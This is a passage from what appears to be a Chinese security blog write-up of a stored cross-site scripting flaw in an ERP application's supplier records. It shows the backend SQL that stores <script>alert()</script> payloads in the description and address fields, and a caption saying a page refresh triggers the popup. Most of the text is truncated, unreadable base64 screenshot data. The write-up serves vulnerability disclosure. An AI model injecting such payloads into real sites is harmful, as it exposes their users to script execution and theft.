0L6NZnKqKG9g+p8tn616b0If5QxCSsJtUMzo4UnrG09h68vm0SvEDvnhi7lsq/KxxCpTB1xPTfE5zImZim9551bw9dxkmoKf+gPkzpVvOCOAYnxcPtF8PsLYOVOeGNV3VTd7s2Fsf1gVjq1Drw/2AJ09ASnU6l5UOcLXQOZ/zW0rGJcY1oCqaXPedKHc41dN8//zbgV8L7HZd7zLfBx34rhfaDPparP3d+rM2C03+MJ3fy+bkKZzx8q79A4426YUe64jb4iPBpmTYCxFaqjqlbjIHQxzO9a/U0X/u9tyfsXIIgNKBVazqhkXTDdLFOrvpGgRLDj8XO8wXF9+/MouCux4vL3PoZ7D5Q+fuEqOLt8oWUWXDcbvq/PAZ4gYYXnUhj2c433aQiXdnJxXpK75LFhGpiGiek2MQyDzOwienZqSWzTSLKO5mCzej44t9tTQWu1WnC53GAxGNS7PbvyijEMAxPTe8DS5zovyc2lnVx8sbP24XQwnW3Xr676e7D8DVZBq+J7e2E/z/NW9/s8mN/9jSaw7dQb5g6FpKqqoqPhks5wUx9oHmC1qxiWb4GHfoSdwOgOsDCIv/v3pEBmDcaaFAeJwZ5X+cf/x1dlP4xHnwt/P7e0GtnaDK5tD8v3BnecVvFwaT94oEtp+2lrc7i5PdxVyTHq0h1XwSOtj/84S5fC+F+P/zgiIiIiIiIijUMqU685k9vis8outqTQpePFvB3/CH/+8G9VdiOribytf+H7rh8xLrw9ReGbCQegKYXupQxsmgmEsWvHNBaZxbDzYZ7f+R/+0Xkb1qjnue/8KaTWzTBqrVWPufS2AnRg2fbzoG8ND5DwPuc09XwZ3vJqtv0fkPYi0/d14emO20jqPJK3zv+Q0noCB9eNu4Dfx2eBuyfL955VNy+kEatQTVuNkFAY3AMGdw++6rZ8hWIgY0fB4VGB1706AwYHcQyA2+72VGhWdpxAAdkH8ype31t4N7C6mhC5G/SPgPV
<p>抓包</p>
<p><a id=img20 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233422-5f64d1ce-c117-1.png><img src="data:image/png;base64,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
<p>后台执行的SQL语句</p>
<div class=highlight><pre><span></span><span class=k>UPDATE</span> <span class=n>jsh_supplier</span> <span class=k>SET</span> <span class=n>supplier</span> <span class=o>=</span> <span class=s1>'客户1'</span><span class=p>,</span> <span class=n>contacts</span> <span class=o>=</span> <span class=s1>'小李'</span><span class=p>,</span> <span class=n>phone_num</span> <span class=o>=</span> <span class=s1>'12345678'</span><span class=p>,</span> <span class=n>email</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>description</span> <span class=o>=</span> <span class=s1>'&lt;script&gt;alert(\'</span><span class=k>desc</span><span class=err>\</span><span class=s1>')&lt;/script&gt;'</span><span class=p>,</span> <span class=k>type</span> <span class=o>=</span> <span class=s1>'客户'</span><span class=p>,</span> <span class=n>enabled</span> <span class=o>=</span> <span class=mi>1</span><span class=p>,</span> <span class=n>begin_need_get</span> <span class=o>=</span> <span class=s1>'0'</span><span class=p>,</span> <span class=n>begin_need_pay</span> <span class=o>=</span> <span class=s1>'0'</span><span class=p>,</span> <span class=n>all_need_get</span> <span class=o>=</span> <span class=s1>'80'</span><span class=p>,</span> <span class=n>fax</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>telephone</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>address</span> <span class=o>=</span> <span class=s1>'&lt;script&gt;alert(\'</span><span class=n>address</span><span class=err>\</span><span class=s1>')&lt;/script&gt;'</span><span class=p>,</span> <span class=n>tax_num</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>bank_name</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>account_number</span> <span class=o>=</span> <span class=s1>''</span><span class=p>,</span> <span class=n>tax_rate</span> <span class=o>=</span> <span class=s1>'12'</span> <span class=k>WHERE</span> <span class=n>jsh_supplier</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>id</span> <span class=o>=</span> <span class=mi>58</span>
</pre></div>
<p>刷新界面触发XSS弹窗</p>
<p><a id=img21 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233435-6774066e-c117-1.png><img src=data:image/png;base64,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
<h3 id=toc-14>其他漏洞点</h3>
<p><a id=img22 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233446-6ded6800-c117-1.png><img src="data:image/png;base64,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
<p><a id=img23 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233500-75e6b0e8-c117-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB2UAAALZCAYAAACH0PprAAEAAElEQVR4nOzddXxc15n4/88w80gjZotsWWbGJA4zNEkppaRb3G673d1v++vuttvl0pabQopJmjbM5NhxHLPMIFnMIx7NaHju/P6QrdiJk8iOZIif9+uV1yu+c+G5M9LonvOc8xzVqy+/nEYIIYQQQgghhBBCCCGEEEIIIcS0UPX7/ZKUFUIIIYQQ4n0kkUhw9PBh8goLsTsc5zocIYQQQgghxFnU0thIJBrD4XKTlZV5rsMRQghxjNabKV/KQgghhBBCvJ/EYjHUajV2hwN53hdCCCGEEOLi0tXRQSyRxGSx4MnIONfhCCGEOEZ9rgMQQgghhBBCCCGEEEIIIYQQQoj3M0nKCiGEEEIIIYQQQgghhBBCCCHENJKkrBBCCCGEEEIIIYQQQgghhBBCTCNJygohhBBCCCGEEEIIIYQQQgghxDTSnusAhBBCCCGEEEIIIYQQQkyNdDpNOp1mLJrgL68dZSyaONchYdKruaTKg91sQK0+v+YJKYpCIplEr9ejOtfBnMBitaLT6VCpVKhU51NkQgghzpQkZYUQQgghhBBCCCGEEOJ9Ip1O0z8S5rVDXfz8mb0ExmLnOiRcFh1F5hnkZjjQac+vLulEMkkkEsFqtaI+j5KfiqJgsVrR6/VoNJpzHY4QQogpcH79BRRCCCGEEEIIIYQQQghxxsaiCV471MXXfrf5XIci3oORkRGUdBqXyyVJWSGEeJ+QpKwQQgghhBBCCCGEEEK8T/zltaP8/Jm95zoMMQVCwSBpRcGXlXWuQxFCCDEFzq8C/kIIIYQQQgghhBBCCCHO2Fg0cV6ULBbvnaIoKIpyrsMQQggxRSQpK4QQQgghhBBCCCGEEEIIIYQQ00jKFwshhBBCCCGEEEIIIcRFRKdV47AYsBn1p3w9TZpEUmEwGB3f12xAp3n7+T1DoShj0QTJ1NTN6kwkEsTjcVKp1Gkfq1ar0el0GAyGKYvnRLFYjEQicUazWDUaDXq9Hp1ONw2RCTF9YrHYGf0+ToWuoQhdw5Fzcm2PzUhNkfecXFu8/0hSVgghhBBCCCGEEEIIIS4idrOeReVZzC7OOOXripJmMBjlhbpWPHYTSyqycVrfPsH5yr4ODrcPMhqOT1mMwVCIPn8fwdDYaR9rMhnxeNxkT9NarEPDwwwODhGJRE/7WKvNgi8zE7fLNQ2RCTE9UqkUI8PDRCLnJjH60OY27t/cfk6uvbQqm//+2EqcVgMateqcxCDekE6nTyrtrlKpUKvVqNUXRmFgScoKIYQQQgghhBBCCCHERcRuMrBgRhY3Li075evJlEJL3yi7m/wU+xxctbCYfK/tbc/XPThGqz8wpUnZUChEZ1cXAwMDp32s3WFHrVZNW1J2eHiY9o52RgOjp32sx+vFYjZLUlZcMFKpFP7eXhKJxLkO5Zyoa+zj0z9+iV98/jI8duO5DueiF4vF6O/vZ3R0FEVRMJlMuN1u3G73uQ5tUiQpK4QQQgghhBBCCCGEEBcRlQoMOg0W46lL6CZTCia9FrVajVajxmzQve2+AHqtGhVTO4NMURSSqSSJZPK0j00mk2dUWniyFEUhmTyz2FKp6Y1N